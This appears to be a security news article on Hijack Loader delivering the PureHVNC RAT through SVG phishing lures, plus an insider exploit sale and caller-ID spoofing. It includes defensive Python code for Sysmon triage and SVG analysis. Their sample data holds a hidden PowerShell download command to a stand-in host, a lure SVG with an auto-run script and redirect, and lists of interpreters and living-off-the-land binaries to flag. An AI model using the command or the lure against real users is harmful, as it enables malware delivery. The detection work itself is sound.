Hijack Loader Delivers PureHVNC in Latin America; Insider Sells Exploits

Hijack Loader expanded its reach in Latin America this month, delivering PureHVNC via malicious SVG attachments and targeted phishing campaigns that impersonate judicial or government documents.

The campaign observed by IBM X-Force used SVG attachments to lure Spanish-speaking recipients into downloading a file that started a staged infection chain, ending in the PureHVNC remote-access trojan. IBM X-Force said the activity ran between August and October 2025 and marked the loader's first observed targeting of the region.

The chain began with social engineering: the SVG attachment served as the initial vector and led to a small loader binary (Hijack Loader), which then downloaded additional modules and the PureHVNC RAT. The Hacker News summarizes the campaign and links the IBM X-Force analysis.

The U.S. Department of Justice disclosed a separate insider-driven supply-chain risk this week: a former defense-contractor employee pleaded guilty to selling restricted cyber tools and exploit components to an alleged broker in exchange for cryptocurrency. DoJ filings say the material included multiple sensitive exploit components intended for government use.

The human element remains central. Europol estimates that caller-ID spoofing underpins roughly €850 million in annual losses worldwide and has called for coordinated action by providers and law enforcement to reduce the technique's role in fraud and social engineering.

On the browser side, Google has published its plan to move Chrome toward HTTPS-by-default, which reduces the downgrade and interception risk of plain-HTTP navigations (Google Security Blog).

The immediate detection priorities are clear: monitor for SVGs and other document attachments arriving from external senders; flag unusual parent-child process chains after a document or attachment is opened (for example, a browser or document viewer spawning a script interpreter or a living-off-the-land binary); and watch for unexpected outbound connections from user workstations, especially from processes that normally have no reason to reach the internet. In addition, insider-risk teams should correlate anomalous cryptocurrency transactions with privileged roles that have access to sensitive tooling.
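The two host-side priorities above (viewer-spawns-interpreter and unexpected outbound connections) can be expressed as a small triage pass over endpoint telemetry. The following is an added example written for this article, not code from IBM X-Force, The Hacker News or Cyberwarzone: it reads Sysmon-style JSON events (Event ID 1 process creation, Event ID 3 network connection, using Sysmon's field names), and the sample events, the viewer and interpreter lists, the allowlist of internet-facing processes and the internal address ranges are all constructed assumptions to be tuned per fleet.

```python
"""Triage of Sysmon-style process-creation and network-connection events.

Added example for this article; the event lines and the process lists are
constructed assumptions, not telemetry or IOCs from the campaign.
"""
import ipaddress
import json

# Processes that render mail-delivered documents, images and SVGs (assumption: extend per fleet).
DOCUMENT_VIEWERS = {
    "outlook.exe", "msedge.exe", "chrome.exe", "firefox.exe", "winword.exe",
    "excel.exe", "acrord32.exe", "mspaint.exe", "explorer.exe",
}
# Interpreters and living-off-the-land binaries a document viewer should rarely spawn.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "curl.exe", "msiexec.exe",
}
# Processes expected to reach the internet from a workstation (assumption).
NETWORK_ALLOWED = {"msedge.exe", "chrome.exe", "firefox.exe", "outlook.exe", "teams.exe", "svchost.exe"}
# Address space treated as internal; anything else counts as external (assumption:
# RFC 1918 plus loopback and link-local; add the organisation's own public ranges).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def flag_process_event(ev: dict):
    """Sysmon Event ID 1: document viewer spawning an interpreter or LOLBin."""
    parent, child = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    if parent in DOCUMENT_VIEWERS and child in SUSPICIOUS_CHILDREN:
        return f"viewer {parent} spawned {child}: {ev.get('CommandLine', '')}"
    return None


def flag_network_event(ev: dict):
    """Sysmon Event ID 3: non-allowlisted process connecting to an external address."""
    image, dest = basename(ev.get("Image", "")), ev.get("DestinationIp", "")
    if image not in NETWORK_ALLOWED and dest and is_external(dest):
        return f"{image} -> {dest}:{ev.get('DestinationPort')}"
    return None


def triage(lines):
    """Return (event_id, host, reason) for every line that trips a rule, in input order."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") == 1:
            hit = flag_process_event(ev)
        elif ev.get("EventID") == 3:
            hit = flag_network_event(ev)
        else:
            hit = None
        if hit:
            alerts.append((ev["EventID"], ev.get("Computer", ""), hit))
    return alerts


# Constructed sample telemetry: one viewer-spawns-PowerShell event, one benign Word launch,
# one external connection from PowerShell, one from the browser, one internal SMB connection.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Computer": "ws-017", "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -nop -c (New-Object Net.WebClient).DownloadFile('https://cdn.example.com/x.bin','C:\\Users\\Public\\x.bin')"}
{"EventID": 1, "Computer": "ws-017", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "WINWORD.EXE /n"}
{"EventID": 3, "Computer": "ws-017", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "203.0.113.25", "DestinationPort": 443}
{"EventID": 3, "Computer": "ws-017", "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "DestinationIp": "203.0.113.25", "DestinationPort": 443}
{"EventID": 3, "Computer": "ws-017", "Image": "C:\\Windows\\System32\\rundll32.exe", "DestinationIp": "10.20.30.40", "DestinationPort": 445}
"""


def run_sample():
    return triage(SAMPLE_EVENTS.splitlines())


if __name__ == "__main__":
    for event_id, host, reason in run_sample():
        print(f"[event {event_id}] {host}: {reason}")
```

Two rules fire on the sample: the Edge-to-PowerShell spawn and the PowerShell connection to an external address; the browser's own connection and the internal SMB session stay quiet. The value is in the join: a viewer-spawned interpreter that then talks out is the shape of a staged loader, and an analyst should pivot from either alert to the other on the same host.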

Further technical follow-up should focus on acquiring sample SVG and Hijack Loader artifacts for static and dynamic analysis. An SVG is XML, so the first pass is cheap: inspect it for script, event-handler attributes, embedded HTML and links to external hosts before detonating anything. Because loaders often vary by campaign, reversing the exact download-and-execute chain and enumerating command-and-control endpoints will yield the IOCs needed for enterprise detection and YARA rule development.
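A static SVG triage of that kind, as an added example for this article rather than IBM X-Force's or Cyberwarzone's tooling: it parses the file as XML and reports the constructs that make an SVG dangerous when a mail client hands it to a browser (inline or external script, `on*` event handlers, `javascript:` URIs, `foreignObject`/`iframe` embedding HTML, external links, and `data:` payloads with their decoded size). The two sample files are constructed for illustration and are not the campaign's lures; the element and attribute lists are generic SVG/XML indicators, not campaign IOCs. It uses the standard-library parser for portability; on untrusted input in production, swap in defusedxml to block entity expansion.

```python
"""Static triage of SVG attachments (added example; generic SVG indicators, not campaign IOCs)."""
import base64
import re
import xml.etree.ElementTree as ET  # assumption: stdlib parser; prefer defusedxml on untrusted files

EMBEDS_HTML = {"foreignobject", "iframe", "embed", "object"}
LINK_ATTRS = {"href", "src", "action", "formaction", "data"}  # xlink:href localises to "href"


def local(name: str) -> str:
    """Strip an ElementTree '{namespace}' prefix and lower-case the local name."""
    return name.rsplit("}", 1)[-1].lower()


def triage_svg(svg_text: str) -> dict:
    root = ET.fromstring(svg_text)
    f = {"script_elements": 0, "event_handlers": [], "javascript_uris": [],
         "external_links": [], "data_uris": [], "embedded_html": 0}
    for el in root.iter():
        tag = local(el.tag)
        if tag == "script":
            f["script_elements"] += 1
        if tag in EMBEDS_HTML:
            f["embedded_html"] += 1
        for attr, value in el.attrib.items():
            name, v = local(attr), value.strip()
            if name.startswith("on"):                      # onload, onclick, onmouseover ...
                f["event_handlers"].append(f"{tag}@{name}")
            if name in LINK_ATTRS:
                if re.match(r"(?i)javascript:", v):
                    f["javascript_uris"].append(v[:60])
                elif re.match(r"(?i)(https?|ftp)://", v):
                    f["external_links"].append(v)
                elif v.lower().startswith("data:"):
                    header, _, payload = v[5:].partition(",")
                    mime = header.split(";")[0] or "text/plain"
                    try:  # decoded size shows whether a "picture" is really a dropped payload
                        size = (len(base64.b64decode(payload, validate=True))
                                if ";base64" in header.lower() else len(payload))
                    except ValueError:
                        size = -1
                    f["data_uris"].append((mime, size))
    if f["script_elements"] or f["event_handlers"] or f["javascript_uris"]:
        f["risk"] = "high"        # executes code as soon as a browser renders it
    elif f["external_links"] or f["embedded_html"] or f["data_uris"]:
        f["risk"] = "medium"      # click-through lure or embedded content; needs a look
    else:
        f["risk"] = "low"
    return f


# Constructed samples: a plain icon, and a lure-style SVG combining several indicators.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="navy"/></svg>'

SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="fetchDoc()">
  <text x="10" y="20">Notificacion judicial - haga clic para descargar</text>
  <a xlink:href="https://download.example.com/expediente.zip"><rect width="200" height="40" fill="#eee"/></a>
  <script><![CDATA[function fetchDoc(){ window.location = "https://download.example.com/expediente.zip"; }]]></script>
  <foreignObject width="1" height="1"><iframe xmlns="http://www.w3.org/1999/xhtml" src="https://download.example.com/landing"></iframe></foreignObject>
  <image xlink:href="data:image/png;base64,iVBORw0KGgo=" width="1" height="1"/>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, triage_svg(doc))
```

The findings are deliberately structured rather than a single verdict: the external hosts feed a blocklist, the `data:` sizes tell the analyst whether to carve an embedded payload, and the handler and script counts decide whether the file needs a sandbox detonation at all. Pair this with the mail-gateway rule that quarantines SVG attachments from external senders in the first place.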

Cyberwarzone's earlier coverage of related supply-chain and loader incidents provides context for these trends; see our reporting on large-scale phishing operations at Phishing Campaign Targets Travel Websites and on registry-based threats at PhantomRaven Malware Found in 126 npm Packages.

The week's news underscores an enduring fact: social engineering plus staged loaders remains one of the most reliable attack patterns. "Caller ID spoofing drives financial fraud and enables social engineering scams," Europol wrote.